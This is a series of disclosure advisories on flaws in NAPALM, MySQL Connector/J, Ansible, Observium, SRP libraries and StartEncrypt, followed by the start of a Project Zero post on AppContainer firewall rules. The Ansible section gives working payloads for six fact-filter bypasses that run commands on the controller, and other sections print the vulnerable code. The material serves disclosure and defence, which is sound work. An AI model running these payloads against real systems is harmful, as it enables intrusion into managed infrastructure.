                bgp_group, 'NeighborGroupAFTable/NeighborGroupAF/Multipath') or 'false').title())

napalm_iosxr/iosxr.py#L821
napalm_iosxr/iosxr.py#L821
napalm_iosxr/iosxr.py#L952
napalm_iosxr/iosxr.py#L966
napalm_iosxr/iosxr.py#L968
napalm_iosxr/iosxr.py#L970
napalm_iosxr/iosxr.py#L1003
napalm_iosxr/iosxr.py#L1005
napalm_iosxr/iosxr.py#L1145
napalm_iosxr/iosxr.py#L1368

Mitigation

Users that are unable to update, can mitigate the issues by not using the < or < validation options and not use the IOS XR driver.

Resolution

Users can update to version 0.24.3 of napalm-base and 0.5.3 of napalm-iosxr, which fixes these vulnerabilities.

Challenge

We have taken the liberty to transform this vulnerability into a CTF challenge for SHA2017. Exploitation is left as an exercise for the reader:

#!/usr/bin/env python2

eval(raw_input().title())

Conclusion

The NAPALM project assumes that all nodes are playing nice. However, this assumption does not hold in a situation where a node is compromised. The project would benefit from a more defensive programming style, were values that are returned from a node are considered hostile and addressed accordingly.

We would like to thank the developers of NAPALM for their quick response. The mentioned vulnerabilities were fixed within 2 hours after our initial email!

Timeline

2017-07-12 First contact with NAPALM developers
2017-07-12 NAPALM released a fix

MySQL Connector/J - Unexpected deserialisation of Java objects

25 April 2017 at 00:00

A malicious MySQL database or a database containing malicious contents can obtain remote code execution in applications connecting using MySQL Connector/J.

Technical Background

MySQL Connector/J is a driver for MySQL adhering to the Java JDBC interface. One of the features offered by MySQL Connector/J is support for automatic serialization and deserialization of Java objects, to make it easy to store arbitrary objects in the database.

When deserializing objects, it is important to never deserialize objects received from untrusted sources. As certain functions are automatically called on objects during deserialization and destruction, attackers can combine objects in unexpected ways to call specific functions, eventually leading to the execution of arbitrary code (depending on which classes are loaded). As the code is often executed as soon as the object is constructed or destructed, additional type-checking on the constructed object is not enough to protect against this.

MySQL Connector/J requires the flag autoDeserialize to be set to true before objects are automatically deserialized, which should only be set when the database and its contents are fully trusted by the application.

Vulnerability

During a short evaluation of the MySQL Connector/J source code, a method was found to deserialize objects from the database when this flag is not set and when API functions are used which do not imply the deserialization of objects at all.

The conditions are the following:

  • The flag useServerPrepStmts is set to true. With this flag enabled, the server caches prepared SQL statements and arguments are sent to it separately. As this allows statements to be reused, it is often enabled for increased performance.

  • The application is reading from a column having type BLOB, or the similar TINYBLOB, MEDIUMBLOB or LONGBLOB.

  • The application is reading from this column using .getString() or one of the functions reading numeric values (which are first read as strings and then parsed as numbers). Notably not .getBytes() or .getObject().

When these conditions are met, MySQL Connector/J will check if the data starts with 0xAC 0xED (the magic bytes of a serialized Java object) and if so, attempt to deserialize it and try to convert it to a string.

The vulnerable code:

case Types.LONGVARBINARY:

if (!field.isBlob()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else if (!field.isBinary()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else {
    byte[] data = getBytes(columnIndex);
    Object obj = data;

    if ((data != null) && (data.length >= 2)) {
        if ((data[0] == -84) && (data[1] == -19)) {
            // Serialized object?
            try {
                ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
                ObjectInputStream objIn = new ObjectInputStream(bytesIn);
                obj = objIn.readObject();
                objIn.close();
                bytesIn.close();
            } catch (ClassNotFoundException cnfe) {
                throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
                        + Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
            } catch (IOException ex) {
                obj = data; // not serialized?
            }
        }

        return obj.toString();
    }

src/com/mysql/jdbc/ResultSetImpl.java#L3422-L3450

The combination of a column of type BLOB and the vulnerable functions does not follow common best practices for using a database: BLOB columns are meant to store arbitrary binary data, which should be read using .getBytes(). However, there are many scenarios where this can still be exploited by an attacker:

  • An application does not follow best practices and stores text (or numbers) in a column of type BLOB and an attacker can insert arbitrary binary data into this column.

  • An application is configured to connect to a remote untrusted database or over an unencrypted connection which is intercepted by an attacker.

  • An application has an SQL injection vulnerability which allows an attacker to change the type of a columm to BLOB.

Impact

An attacker who is able to abuse this vulnerability, can have the application deserialize arbitrary objects. The direct impact is that the attacker can call into any loaded classes. Often, but depending on the application, this can be leveraged to gain code execution by calling into loaded classes that perform actions on files or system commands.

Resolution

The vulnerability can be resolved by updating MySQL Connector/J to version 5.1.41 and ensuring the flag autoDeserialize is not set.

Mitigation

This vulnerability can be mitigated on older versions by ensuring the flags autoDeserialize and useServerPrepStmts are not set.

Conclusion

MySQL Connector/J will (under specific conditions) unexpectedly deserialize objects from a MySQL database, allowing remote code execution. This could be used by attackers to escalate access to a database into remote code execution or possibly allow remote code execution by any user who can insert data into a database.

Timeline

2017-01-23: Issue reported to [email protected].
2017-01-23: Received a confirmation that the bug was under investigation.
2017-01-27: Publicly fixed in commit 6189e718de5b6c6115aee45dd7a480081c129d68
2017-02-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-02-28: Fix released in version 5.1.41.
2017-03-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-04-18: Oracle published Critical Patch Update April 2017, without this issue.
2017-04-19: Contacted Oracle to ask if a CVE number has been assigned to this issue.
2017-04-19: Received a reply from Oracle that they were verifying which versions are vulnerable.
2017-04-21: Oracle published revision 2 of the Critical Patch Update of April 2017, including this issue.

Ansible - command execution on Ansible controller from host

9 January 2017 at 00:00

During a summary code review of Ansible, Computest found and exploited several issues that allow a compromised host to execute commands on the Ansible controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About Ansible

“Ansible is an open-source automation engine that automates cloud provisioning, configuration management, and application deployment. Once installed on a control node, Ansible, which is an agentless architecture, connects to a managed node through the default OpenSSH connection type.” - wikipedia.org

Technical Background

A big threat to a configuration management system like Ansible, Puppet, Salt Stack and others, is compromise of the central node. In Ansible terms this is called the Controller. If the Controller is compromised, an attacker has unfettered access to all hosts that are controlled by the Controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Fortunately for team blue, in the case of Ansible the attack surface of the Controller is pretty small. Since Ansible is agent-less and based on push, the Controller does not expose any services to hosts.

A very interesting bit of attack surface though is in the Facts. When Ansible runs on a host, a JSON object with Facts is returned to the Controller. The Controller uses these facts for various housekeeping purposes. Some facts have special meaning, like the fact ansible_python_interpreter and ansible_connection. The former defines the command to be run when Ansible is looking for the python interpreter, and the second determines the host Ansible is running against. If an attacker is able to control the first fact he can execute an arbitrary command, and if he is able to control the second fact he is able to execute on an arbitrary (Ansible-controlled) host. This can be set to local to execute on the Controller itself.

Because of this scenario, Ansible filters out certain facts when reading the facts that a host returns. However, we have found 6 ways to bypass this filter.

In the scenarios below, we will use the following variables:

PAYLOAD = "touch /tmp/foobarbaz"

# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
    # Note that it echoes an empty dictionary {} (it's not a format string).
    'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
    'ansible_connection': 'local',
    # Become is usually enabled on the remote host, but on the Ansible
    # controller it's likely password protected. Disable it to prevent
    # password prompts.
    'ansible_become': False,
}

Bypass #1: Adding a host

Ansible allows modules to add hosts or update the inventory. This can be very useful, for instance when the inventory needs to be retrieved from a IaaS platform like as the AWS module does.

If we’re lucky, we can guess the inventory_hostname, in which case the host_vars are overwritten and they will be in effect at the next task. If host_name doesn’t match inventory_hostname, it might get executed in the play for the next hostgroup, also depending on the limits set on the commandline.

# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
    # assume that host_name is the same as inventory_hostname
    'host_name': socket.gethostname(),
    'host_vars': INTERPRETER_FACTS,
}

lib/ansible/plugins/strategy/__init__.py#L447

Bypass #2: Conditionals

Ansible actions allow for conditionals. If we know the exact contents of a when clause, and we register it as a fact, a special case checks whether the when clause matches a variable. In that case it replaces it with its contents and evaluates them.

# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
    data['ansible_facts'][known_conditional] = LOOKUP

Bypass #3: Template injection in stat module

The template module/action merges its results with those of the stat module. This allows us to bypass the stripping of magic variables from ansible_facts, because they’re at an unexpected location in the result tree.

data.update({
    'stat': {
        'exists': True,
        'isdir': False,
        'checksum': {
            'rc': 0,
            'ansible_facts': INTERPRETER_FACTS,
        },
    }
})

lib/ansible/plugins/action/template.py#L39
lib/ansible/plugins/action/template.py#L49
lib/ansible/plugins/action/template.py#L146
lib/ansible/plugins/action/__init__.py#L678

Bypass #4: Template injection by changing jinja syntax

Remote facts always get quoted. set_fact unquotes them by evaluating them. UnsafeProxy was designed to defend against unquoting by transforming jinja syntax into jinja comments, effectively disabling injection.

Bypass the filtering of {{ and {% by changing the jinja syntax. The {{}} is needed to make it look like a variable. This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
})

Bypass #5: Template injection in dict keys

Strings and lists are properly cleaned up, but dictionary keys are not. This works against:

- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}

The prefix and/or suffix are needed in order to turn the dict into a string, otherwise the value would remain a dict.

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})

Bypass #6: Template injection using safe_eval

There’s a special case for evaluating strings that look like a list or dict. Strings that begin with { or [ are evaluated by safe_eval. This allows us to bypass the removal of jinja syntax: we use the whitelisted Python to re-create a bit of Jinja template that is interpreted.

This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})

Issue: Disabling verbosity

Verbosity can be set on the controller to get more debugging information. This verbosity is controlled through a custom fact. A host however can overwrite this fact and set the verbosity level to 0, hiding exploitation attempts.

data['_ansible_verbose_override'] = 0

lib/ansible/plugins/callback/default.py#L99
lib/ansible/plugins/callback/default.py#L208

Issue: Overwriting files

Roles usually contain custom facts that are defined in defaults/main.yml, intending to be overwritten by the inventory (with group and host vars). These facts can be overwritten by the remote host, due to the variable precedence. Some of these facts may be used to specify the location of a file that will be copied to the remote host. The attacker may change it to /etc/passwd. The opposite is also true, he may be able to overwrite files on the Controller. One example is the usage of a password lookup with where the filename contains a variable.

Mitigation

Computest is not aware of mitigations short of installing fixed versions of the software.

Resolution

Ansible has released new versions that fix the vulnerabilities described in this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.

Conclusion

The handling of Facts in Ansible suffers from too many special cases that allow for the bypassing of filtering. We found these issues in just hours of code review, which can be interpreted as a sign of very poor security. However, we don’t believe this is the case.

The attack surface of the Controller is very small, as it consists mainly of the Facts. We believe that it is very well possible to solve the filtering and quoting of Facts in a sound way, and that when this has been done, the opportunity for attack in this threat model is very small.

Furthermore, the Ansible security team has been understanding and professional in their communication around this issue, which is a good sign for the handling of future issues.

Timeline

2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team ([email protected])
2016-12-09 Submitted PoC and description to [email protected]
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version\

Observium - unauthenticated remote code execution

10 November 2016 at 00:00

During a recent penetration test Computest found and exploited various issues in Observium, going from unauthenticated user to full shell access as root. We reported these issues to the Observium project for the benefit of our customer and other members of the community.

This was not a full audit and further issues may or may not be present.

(Note about affected versions: The Observium project does not provide a way to download older releases for non-paying users, so there was no way to check whether these problems exist in older versions. All information given here applies to the latest Community Edition as of 2016-10-05.)

About Observium

“Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more.” - observium.org

Issue #1: Deserialization of untrusted data

Observium uses the get_vars() function in various places to parse the user-supplied GET, POST and COOKIE values. This function will attempt to unserialize data from any of the requested fields using the PHP unserialize() function.

Deserialization of untrusted data is in general considered a very bad idea, but the practical impact of such issues can vary.

Various memory corruption issues have been identified in the PHP unserialize() function in the past, which can lead directly to remote code execution. On patched versions of PHP exploitability depends on the application.

In the case of Observium the issue can be exploited to write mostly user-controlled data to an arbitrary file, such as a PHP session file. Computest was able to exploit this issue to create a valid Observium admin session.

The function get_vars() eventually calls var_decode(), which unserializes the user input.

./includes/common.inc.php:

function var_decode($string, $method = 'serialize')
{
 $value = base64_decode($string, TRUE);
 if ($value === FALSE)
 {
   // This is not base64 string, return original var
   return $string;
 }

 switch ($method)
 {
   case 'json':
     if ($string === 'bnVsbA==') { return NULL; };
     $decoded = @json_decode($value, TRUE);
     if ($decoded !== NULL)
     {
       // JSON encoded string detected
       return $decoded;
     }
     break;
   default:
     if ($value === 'b:0;') { return FALSE; };
     $decoded = @unserialize($value);
     if ($decoded !== FALSE)
     {
       // Serialized encoded string detected
       return $decoded;
     }
 }

Issue #2: Admins can inject shell commands, possibly as root

Admin users can change the path of various system utilities used by Observium. These paths are directly used as shell commands, and there is no restriction on their contents.

This is not considered a bug by the Observium project, as Admin users are considered to be trusted.

The Observium installation guide recommends running various Observium scripts from cron. The instructions given in the installation guide will result in these scripts being run as root, and invoking the user- controllable shell commands as root.

Since this functionality resulted in an escalation of privilege from web application user to system root user it is included in this advisory despite the fact that it appears to involve no unintended behavior in Observium.

Even if the Observium system is not used for anything else, privileged users log into this system (and may reuse passwords elsewhere), and the system as a whole may have a privileged network position due to its use as a monitoring tool. Various other credentials (SNMP etc) may also be of interest to an attacker.

The function rrdtool_pipe_open() uses the Admin-supplied config variable to build and run a command:

./includes/rrdtool.inc.php:

function rrdtool_pipe_open(&$rrd_process, &$rrd_pipes)
{
 global $config;

 $command = $config['rrdtool'] . " -"; // Waits for input via standard input (STDIN)

 $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin
    1 => array("pipe", "w"),  // stdout
    2 => array("pipe", "w")   // stderr
 );

 $cwd = $config['rrd_dir'];
 $env = array();

 $rrd_process = proc_open($command, $descriptorspec, $rrd_pipes, $cwd, $env);

Issue #3: Incorrect use of cryptography in event feed authentication

Observium contains an RSS event feed functionality. Users can generate an RSS URL that displays the events that they have access to.

Since RSS viewers may not have access to the user’s session cookies, the user is authenticated with a user-specific token in the feed URL.

This token consists of encrypted data, and the integrity of this data is not verified. This allows a user to inject essentially random data that the Observium code will treat as trusted.

By sending arbitrary random tokens a user has at least a 1/65536 chance of viewing the feed with full admin permissions, since admin privileges are granted if the decryption of this random token happens to start with the two-character string 1| (1 being the user id of the admin account).

In general a brute force attack will gain access to the feed with admin privileges in about half an hour.

./html/feed.php:

if (isset($_GET['hash']) && is_numeric($_GET['id']))
{
 $key = get_user_pref($_GET['id'], 'atom_key');
 $data = explode('|', decrypt($_GET['hash'], $key)); // user_id|user_level|auth_mechanism

 $user_id    = $data[0];
 $user_level = $data[1]; // FIXME, need new way for check userlevel, because it can be changed
 if (count($data) == 3)
 {
   $check_auth_mechanism = $config['auth_mechanism'] == $data[2];
 } else {
   $check_auth_mechanism = TRUE; // Old way
 }

 if ($user_id == $_GET['id'] && $check_auth_mechanism)
 {
   session_start();
   $_SESSION['user_id']   = $user_id;
   $_SESSION['userlevel'] = $user_level;

(Note: this session is destroyed at the end of the page)

Issue #4: Authenticated SQL injection

One of the graphs supported by Observium contains a SQL injection problem. This code is only reachable if unauthenticated users are permitted to view this graph, or if the user is authenticated.

The problem lies in the port_mac_acc_total graph.

When the stat parameter is set to a non-empty value that is not bits or pkts the sort parameter will be used in a SQL statement without escaping or validation.

The id parameter can be set to an arbitary numeric value, the SQL is executed regardless of whether this is a valid identifier.

This can be exploited to leak various configuration details including the password hashes of Observium users.

./html/includes/graphs/port/mac_acc_total.inc.php:

$port      = (int)$_GET['id'];
if ($_GET['stat']) { $stat      = $_GET['stat']; } else { $stat = "bits"; }
$sort      = $_GET['sort'];

if (is_numeric($_GET['topn'])) { $topn = $_GET['topn']; } else { $topn = '10'; }

include_once($config['html_dir']."/includes/graphs/common.inc.php");

if ($stat == "pkts")
{
 $units='pps'; $unit = 'p'; $multiplier = '1';
 $colours_in  = 'purples';
 $colours_out = 'oranges';
 $prefix = "P";
 if ($sort == "in")
 {
   $sort = "pkts_input_rate";
 } elseif ($sort == "out") {
   $sort = "pkts_output_rate";
 } else {
   $sort = "bps";
 }
} elseif ($stat == "bits") {
 $units='bps'; $unit='B'; $multiplier='8';
 $colours_in  = 'greens';
 $colours_out = 'blues';
 if ($sort == "in")
 {
    $sort = "bytes_input_rate";
 } elseif ($sort == "out") {
    $sort = "bytes_output_rate";
 } else {
   $sort = "bps";
 }
}

$mas = dbFetchRows("SELECT *, (bytes_input_rate + bytes_output_rate) AS bps,
       (pkts_input_rate + pkts_output_rate) AS pps
       FROM `mac_accounting`
       LEFT JOIN  `mac_accounting-state` ON  `mac_accounting`.ma_id =  `mac_accounting-state`.ma_id
       WHERE `mac_accounting`.port_id = ?
       ORDER BY $sort DESC LIMIT 0," . $topn, array($port));

Mitigation

The Observium web application can be placed behind a firewall or protected with an additional layer of authentication. Even then, admin users should be treated with care as they are able to execute commands (probably as root) until the issues are patched.

The various cron jobs needed by Observium can be run as the website user (e.g. www-data) or a user created specifically for that purpose instead of as root.

Resolution

Observium has released a new Community Edition to resolve these issues.

The Observium project does not provide changelogs or version numbers for community releases.

Timeline

2016-09-01 Issue discovered during penetration test
2016-10-21 Vendor contacted
2016-10-21 Vendor responds that they are working on a fix
2016-10-26 Vendor publishes new version on website
2016-10-28 Vendor asks Computest to comment on changes
2016-10-31 Computest responds with quick review of changes
2016-11-10 Advisory published

cSRP/srpforjava - obtaining of hashed passwords

18 August 2016 at 00:00

In this blog we’ll look at an interesting vulnerability in some implementations of a widely used authentication protocol; Secure Remote Password (SRP). We’ll dive into the cryptography details to see what implications a little mathematical oversight has for the security of the whole protocol.

This vulnerability was discovered while evaluating some different implementations of the SRP 6a protocol.

The problem was initially identified in cSRP (which also affects PySRP if using the C module for acceleration), and was also found in srpforjava. It’s not clear how many users these projects have, but regardless the bug is interesting enough to discuss by itself.

SRP: What is it good for?

SRP is a popular choice for linking devices or apps to a master server using a short password or pin code. SRP is often used for authentication that involves a password, like in mobile banking apps (for instance the ING mobile banking app in the Netherlands) but also in Steam.

Quote from http://srp.stanford.edu/: “The Secure Remote Password protocol performs secure remote authentication of short human-memorizable passwords and resists both passive and active network attacks.”

In other words, being able to read and mess with network traffic of a legitimate client does not help an attacker log in. The fastest way to break in is to just try every possible password. The server can prevent this using rate limiting or by locking accounts.

SRP in three steps

The protocol consists of three stages:

  1. Client and server exchange public ephemeral values.
  2. Client and server calculate the session key.
  3. Client and server prove to each other that they know the session key. This can optionally be integrated with the normal communication that happens after authentication.

For the purpose of this blog only the first part of the protocol is relevant. In this stage the client sends its ephemeral value along with a username, and the server responds with its own ephemeral value and the random salt value for the given user.

How SRP checks your password

In the first part of the protocol the client and server exchange “ephemeral values”, which are large numbers calculated according to the SRP protocol. These values actually play multiple roles at once in the SRP protocol. This is how it performs authentication and establishes a shared session key in just one round trip!

The first role is as a kind of key exchange in a way that is similar to how Diffie-Hellman key exchange works. In Diffie-Hellman both parties generate a random number r which is their private value, and use this to generate a public value using the formula (g ** r) % N, where g and N are public fixed parameters. In SRP the client generates its public value in exactly this way, but the server does something slightly different.

In SRP the Diffie-Hellman key exchange is altered to additionally force the client to prove that it knows the password for a certain user. One way to think of this is that the server alters its public value based on the password for the given user, and the client needs to compensate for this alteration in order to derive the same session key as the server. The client can only perform this compensation if it knows the password.

In order to perform this calculation the server uses a “verifier” value for the desired user. In many ways a verifier is like a password hash. It is only derived from the username, the password, and the salt. Since the username and salt are stored in plain text on the server and are sent in plain text over the network, the password is the only unknown part and an attacker can generate verifiers for every possible password until he finds a match. Since a verifier is generated using only a single hash operation and a modular exponentiation in most SRP implementations, it is fairly easy to brute force compared to modern password hashing methods like scrypt.

One other way this “verifier” value is like a password hash, is that it’s not sent over the network, and even if it is stolen from the server, a hacker can’t use it to log in directly. Because of how it’s generated the server can use it to calculate its public ephemeral value, but a client can’t use it to calculate the session key. A client needs the actual password for that.

How the hacker gets your password: the bug

Warning: math ahead! It helps if you understand some algebra, but hopefully it’s not required.

Now we come to the actual bug, which is in the calculation of the server’s public ephemeral value. This is the formula to calculate this value:

B = (k * v + ((g ** b) % N)) % N

The ((g ** b) % N) part is just the standard Diffie-Hellman calculation of a public value from the private random value b. The values g and N are the public Diffie-Hellman parameters.

The addition of k * v is the extra adjustment for authentication in the SRP protocol. The value k is calculated by hashing the (public) g and N values (so k is also public), while v is the verifier for the user that is logging in.

In the buggy implementations, the actual calculation for B is slightly different:

B' = k * v + ((g ** b) % N)

In other words, the final reduction modulo N is missing. As it turns out, that is actually very important! Because B has this final modulo operation, the public Diffie-Hellman value and the value derived from the verifier are hopelessly mixed up, and we can’t separate the two at all anymore.

But what about B'? Well, we can divide it by k.

B' = (k * v + ((g ** b) % N)) / k

Let’s define i and j as the unknown quotient and remainder of dividing the public Diffie-Hellman value ((g ** b) % N) by k:

((g ** b) % N) = k * i + j
B' = (k * v + (k * i + j)) / k

By definition j is smaller than k so we disregard it:

B' = (k * v + k * i) / k
B' / k = v + i

Lets write |B| for the (approximate) length of B in bits. I’m going to ask you to just take my word for it that values that came from a modular exponentiation ((g**x) % N) (like v) are about as long as N (say 2048 bit), and values resulting from a hash (like k) are about as long as whatever the size of that hash function’s output is (say 256 bits).

Now we know these things about the lengths of v and i:

|v| ~= |N|
|i| ~= |N| - |k|

In words: v is 2048 bits, while i is (2048 – 256) bits long. So the value i is about 256 bits shorter than v.

Take a look at B' / k again with that in mind:

B' / k = v + i

This means that the top 256 bits of B’ / k are equal to the top 256 bits of the verifier v! In other words, the server leaks the top 256 bits of the verifier.

What is that good for? Well, the odds of two different verifiers having the same top 256 bits are impossibly small. This means that these top 256 bits are enough to check whether two verifiers are equal, which means we can perform offline password cracking using this leaked part of the verifier.

Note that all bit lengths are approximate, and in any case the values 2048 and 256 depend on the Diffie-Hellman parameters and hash function used.

In short

Because of this bug the server will send a value equivalent to a password hash to any client that wants to log in. This can then be cracked offline, which totally breaks the guarantees of the SRP protocol.

The fix

Tom Cocagne, the maintainer of cSRP, was very quick to fix the affected code after we reported the bug. The fix is to perform the missing modulo operation.

The author of srpforjava was contacted later, after we discovered that this library was also affected. We’ve sent a patch, but this is not applied yet.

Both libraries haven’t had a new release in a long time, and it’s difficult to determine who’s using these libraries. Hopefully this blog post will reach them.

Because the client performs all operations modulo N, the fact that the server now returns different B values does not affect the normal operation of the protocol at all. Clients are compatible with both the patched and unpatched server.

Do not try this at home

This article tries to explain SRP in a simplified way. Please do not go and implement SRP yourself. In fact, please do not implement any cryptography code unless you are an expert! When it comes to cryptography, every detail matters. Even the ones the textbook doesn’t mention.

StartEncrypt - obtaining valid SSL certificates for unauthorized domains

30 June 2016 at 00:00

Recently, we found a critical vulnerability in StartCom’s new StartEncrypt tool, that allows an attacker to gain valid SSL certificates for domains he does not control. While there are some restrictions on what domains the attack can be applied to, domains where the attack will work include google.com, facebook.com, live.com, dropbox.com and others.

StartCom, known for its CA service under the name of StartSSL, has recently released the StartEncrypt tool. Modeled after LetsEncrypt, this service allows for the easy and free installation of SSL certificates on servers. In the current age of surveillance and cybercrime, this is a great step forwards, since it enables website owners to provide their visitors with better security at small effort and no cost.

However, there is a lot that can go wrong with the automated issuance of SSL certificates. Before someone is issued a certificate for their domain, say computest.nl, the CA needs to check that the request is done by someone who is actually in control of the domain. For “Extended Validation” certificates this involves a lot of paperwork and manual checking, but for simple, so-called “Domain Validated” certificates, often an automated check is used by sending an email to the domain or asking the user to upload a file. The CA has a lot of freedom in how the check is performed, but ultimately, the requester is provided with a certificate that provides the same security no matter which CA issued it.

StartEncrypt

So, StartEncrypt. In order to make the issuance of certificates easy, this tool runs on your server (Windows or Linux), detects your webserver configuration, and requests DV certificates for the domains that were found in your config. Then, the StartCom API does a HTTP request to the website at the domain you requested a certificate for, and checks for the presence of a piece of proof that you have access to that website. If the proof is found, the API returns a certificate to the client, which then installs it in your config.

However, it appears that the StartEncrypt tool did not receive proper attention from security-minded people in the design and implementation phases. While the client contains numerous vulnerabilities, one in particular allows the attacker to “trick” the validation step.

The first bug

The API checks if a user is authorized to obtain a certificate for a domain by downloading a signature from that domain, by default from the path /signfile. However, the client chooses that path during a HTTP POST request to that API.

A malicious client can specify a path to any file on the server for which a certificate is requested. This means that, for example, anyone can obtain a certificate for sites like dropbox.com and github.com where users can upload their own files.

That’s not all

While this is serious, most websites don’t allow you to upload a file and then have it presented back to you in raw format like github and dropbox do. Another issue in the API however allows for much wider exploitation of this issue: the API follows redirects. So, if the URL specified in the “verifyRes” parameter returns a redirect to another URL, the API will follow that until it gets to the proof. Even if the redirect goes off-domain. Since the first redirect was to the domain that is being verified, the API considers the proof correct even if it is redirected to a different website.

This means that an attacker can obtain an SSL certificate for any website that either:

  • Allows users to upload files and serves them back raw, or
  • Has an “open redirect” vulnerafeature in it

Open redirects are pages that take a parameter that contains a URL, and redirect the user to it. This seems like a strange feature, but this mechanism is often implemented for instance in logout or login pages. After a successful logout, you will be redirected to some other page. That other page URL is included as a parameter to the logout page. For instance, http://mywebsite/logout?returnURL=/login might redirect you to /login after logout.

While many see open redirects as a vulnerability that needs fixing, others do not. Google for instance has excluded open redirects from their vulnerability reward program. By itself an open redirect is not exploitable, so it is understandable that many do not see it as a security issue. However, when combined with a vulnerability like the one present in StartEncrypt, the open redirect suddenly has great impact.

It’s actually even worse: the OAuth 2.0 specification practically mandates that an open redirect must be present in each implementation of the spec. For this reason, login.live.com and graph.facebook.com for instance contain open redirects.

When combining the path-bug with the open redirect, suddenly many more certificates can be obtained, like for google.com, paypal.com, linkedin.com, login.live.com and all those other websites with open redirects. While not every website has an open redirect feature, many do at some point in time.

That’s still not all

Apart from the vulnerability described above, we found some other vulnerabilities in the client while doing just a cursory check. We are only publishing those that according to StartCom have been fixed or are no issue. These include:

  • The client doesn’t check the server’s certificate for validity when connecting to the API, which is pretty ironic for an SSL tool.
  • The API doesn’t verify the content-type of the file it downloads for verification, so attackers can obtain certificates for any website where users can upload their own avatars (in combination with the above vulnerabilities of course)
  • The API only involves the server obtaining the raw RSA signature of the nonce. The signature file doesn’t identify the key nor the nonce that was used. This opens up the possibility of a “Duplicate-Signature Key Selection” attack, just like what Andrew Ayer discovered in the ACME protocol while LetsEncrypt was in beta, see also this post. As long as the signfile is on a domain, an attacker can obtain the signfile, start a new authorization and obtain a nonce and then pick their RSA private key in such a way that their private key verifies their nonce.
  • The private key on the server (/usr/local/StartEncrypt/conf/cert/tokenpri.key) is saved with mode 0666, so world-readable, which means any local user can read or modify it.

All in all, it doesn’t seem like a lot of attention was paid to security in the design and implementation of this piece of software.

Disclosure

As a security company, we constantly do security research. Usually for paying customers. In this case however, we started looking at StartEncrypt out of interest and because of the high impact any issues have for the internet as a whole. That is also why we are disclosing this issue: we believe that CA’s need to become much more aware of the vital role they play in internet security and need to start taking their software security more serious.

Of course, we disclosed the issue to StartCom prior to publishing. The vulnerabilities we described were found in the Linux x86_64 binary version 1.0.0.1. The timeline:

June 22, 2016: issue discovered
June 23, 2016: issue disclosed to StartCom after obtaining email address by phone
June 23, 2016: StartCom takes API offline
June 28, 2016: StartCom takes API online again, incompatible with current client
June 28, 2016: StartCom updates the Windows-client on the download page
June 29, 2016: StartCom updates the Linux-client on the download page, keeping the version number at 1.0.0.1
June 30, 2016: StartCom informs Computest of which issues have been fixed

Conclusion

StartCom launched a tool that makes it easier to secure communications on the internet, which is something we applaud. In doing so however, they seem to have taken some shortcuts in engineering. Using their tool, an attacker is able to obtain certificates for other domains like google.com, linkedin.com, login.live.com and dropbox.com.

In our opinion, StartCom made a mistake by publishing StartEncrypt the way it is. Although they appreciated the issues for the impact they had and were swift in their response, it is apparent that too little attention was paid to security both in design (allowing the user to specify the path) and implementation (for instance in following redirects, static linking against a vulnerable library, and so on). Furthermore, they didn’t learn from the issues LetsEncrypt faced when in beta.

But the issue is broader. As users of the internet, we trust the CA’s to provide us with a base for trust upon which we do business and share our lives online. When a single CA publishes software with this level of security, the trust in the CA system as a whole is undermined.

Understanding Network Access in Windows AppContainers

By: Ryan
19 August 2021 at 16:37

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

